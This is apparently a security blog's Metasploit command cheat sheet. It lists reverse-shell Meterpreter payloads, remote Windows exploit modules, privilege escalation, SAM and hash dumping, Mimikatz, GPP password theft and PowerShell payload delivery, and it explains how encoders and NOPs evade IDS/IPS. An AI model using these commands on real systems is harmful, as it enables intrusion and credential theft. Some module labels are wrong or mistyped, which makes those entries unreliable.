Want to use Metasploit Pro Framework or Metasploit Unleashed? Well, you will need to know their commands first!. Below we are sharing with you the latest Metasploit Commands List of 2022. This cheat sheet contains all the commands you will ever need from very basics to advance!

In this guide, we will talk about the very basics of the Metasploit commands cheat sheet which can be used in the command-line interface. There are also many other command-line consoles available over the internet (such as MSFConsole Command Line) but they are really hard to use and understand.

The Metasploit Commands Cheat Sheet 2022 (PDF)

Contents

What is Metasploit Framework?

Metasploit is a product that can be used to break into a remote system and it can also be used to test the vulnerability of a computer system. Like all the other Information security tools Metasploit can also be used for both purposes (Unauthorized and Legitimate activities). The Rapid7 has also added the two proprietary editions or versions called the Metasploit Pro and Metasploit Express. You can also see some of our Kali Linux Terminal commands for hacking.

Metasploit highlights the risk and remediation of particular bugs that might be available within your Personal Computer (PC). Later on, the fuzzing tool was also included in Metasploit 3.0 which was used to discover the vulnerabilities of software even with the exploits for the known bugs. After some time the local wireless (802.11) toolset was also added into the Metasploit 3.0 in the month of November 2006. After all these updates the Rapid7 released the Metasploit 4.0 in the month of August 2011.

You can get Metasploit Pro Framework from the below page:

Download Metasploit Pro Framework Free

A Brief History of Metasploit Framework

H. D. Moore was the creator of this portable network tool named Metasploit using Perl in 2003. In 2007, the Metasploit Framework was totally rewritten in Ruby. On October 21st, 2009, Metasploit announced that it has been bought or acquired by the Rapid7. Rapid7 is a security company that provides many sorts of unified vulnerability managing solutions.

List of Latest Metasploit Commands 2022 (New)

  • Meterpreter Payloads:
  • Windows reverse meterpreter payload
CommandDescription of CMD
set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload

Windows VNC payload for Meterpreter

CommandDescription of CMD
set payload windows/vncinject/reverse_tcpset ViewOnly falseMeterpreter Windows VNC Payload

 

Linux Reverse Meterpreter payload

CommandDescription of CMD
set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload

Meterpreter Cheat Sheet Commands (2022 Latest)

CommandDescription of CMD
upload file c:\\windowsMeterpreter uploads file to the Windows target machine
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter downloads the files from Windows target machine
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -cCreates a new channel using the cmd shell
psMeterpreter shows you the current processes that are running
shellMeterpreter gets the shell access on the target machine or server
getsystemMeterpreter attempts to do privilege escalation to gain access to the target
hashdumpMeterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetMeterpreter creates a port forward to the target machine
portfwd delete –l 3389 –p 3389 –r targetMeterpreter deletes the port forward function

Read: Top 9 Microsoft CMD Command Prompt Hacking Commands 2022.

Common Metasploit Modules and Remote Windows Metasploit Modules

CommandDescription of CMD
use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

 

Local Windows Metasploit Modules

CommandDescription of CMD
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

CommandDescription of CMD
use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

Read also: The Perfect Guide to DDoS Like a Pro Hacker.

Metasploit Powershell Modules

CommandDescription of CMD
use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

 Post Exploit Windows Metasploit Modules

CommandDescription of CMD
run post/windows/gather/win_privsMetasploit show privileges of the current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
oad mimikatz -> wdigestMetasplit load Mimikatz
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to

Source: TheHackToday

The Basic Metasploit Commands you need to know in 2022 (PDF Included)

The Metasploit command for updating Framework:

apt update; apt install metasploit-framework

 The following command mentioned above provides the latest version of the Metasploit framework which is updated. The update says the following that we should update the weekly update copy of our Metasploit Framework. But there is a slight disadvantage of this command and it is that running this command might corrupt or break the copy of your software that is installed in your PC.

Recommended read: Top 8 Best Linux Distros for Hacking and Penetration Testing!

Metasploit Commands msfhelp/console:

When you run the Metasploit for the first time then the following window opens on your screen. If you don’t know anything about or don’t have any information related to the Metasploit then you can just type: help to view all of the commands and information related to the Metasploit.

Metasploit Commands for Hacking 2019

I am not going to waste your time in explaining all of the commands on the Metasploit but I will discuss some of the basic and most used commands which you are going to use mostly.

  • Basic Commands: These commands are used to Search, Use, Back, Help, Info and Exit.
  • Exploit Commands: These commands are used to set variables and show the exploit options and evasion options, payloads, and encoders.
  • Exploit execution commands: These commands are used to run and to run exploits against a specific target.

Metasploit Payload Commands

More useful Metasploit Commands:

  • Search Command:

This command is used to search for different types or sorts of vulnerabilities and exploits from the msfconsole.

Meterpreter Commands Linux

  • Info Command:

This command is used to keep an eye on the documentation and take a look at the owner of the exploit.

Read: 8 Best Ways to Secure your Linux Server (Linux Hardening Guide 2022).

Meterpreter Commands for Windows

  • Show options command:

With the help of this simple command, we can use show commands to display all the values required by the payload which can further be used to attack the victim PC or machine which we want to attack.

  • LHOST:

With the help of this command, you can easily perform the attacking the WAN Network you just have to set the LHOST to the static IP Address IP and all other forward ports.

  • LPORT:

If you are trying to on the LAN Network then you don’t have to perform the port forward but you can use any port that you want to use. But if you are attacking the WAN Network then you have to port forward that port which you want to attack respectively.

Metasploit Commands Cheat Sheet Download

  • Show Payloads:

With the help of this command, we use the show payloads command. This command will return a whole list of compatible payloads for the following exploit. In the following picture the Metasploit has loaded many compatible payloads:

  • Show Targets:

This command will return a whole list of operating systems that are very vulnerable to the selected or chosen exploit. After running this command we get the following output of the following exploit:

adobe_flash_shader_drawing_fill exploit.

  • Show Advanced:

By using this show advanced command we can view all of the advanced options for the required exploits.

Download: Nessus Professional Vulnerability Scanner Software.

  • Show Encoders:

This command is used to return all of the compatible encoders. These encoders are used for evading the simple IDS/IPS signatures that are been looked for the certain bytes of the payload available.

  • Show nops:

This command will return a whole list of the NOP generators. NOP is the abbreviation for No Operation and it is used to change the pattern to bypass simple IDS/IPS of common NOP sleds. These NOP generators start with a whole configuration of CPU Architecture in its name.

Download: Acunetix Web Vulnerability Scanner Free.

You can visit the official Offensive Security site for the full A-Z Metasploit commands.

Do you know any more Metasploit Commands that we can add to this list?

In this article, we discussed the List of Metasploit commands in 2022 we also talked about many different commands which you can use to perform various tasks and all of the different functionalities. It is a totally safe method for using and performing vulnerable checking and solving all of those related problems.

I hope this guide will be really helpful to you. Share it with your friends and family to help them solve their problems. If you have any questions then leave them in the comment section. We are always here to help you if you need any help.

Recommended:  How to Secure your iPhone from Hackers (iOS Security Guide)
Shaheer is the founder of SecuredYou. He is a cybersecurity freak and loves anything related to Computers and Technology. Apart from being a tech geek, he loves listening to music and going to the gym.

LEAVE A REPLY

Please enter your comment!
Please enter your name here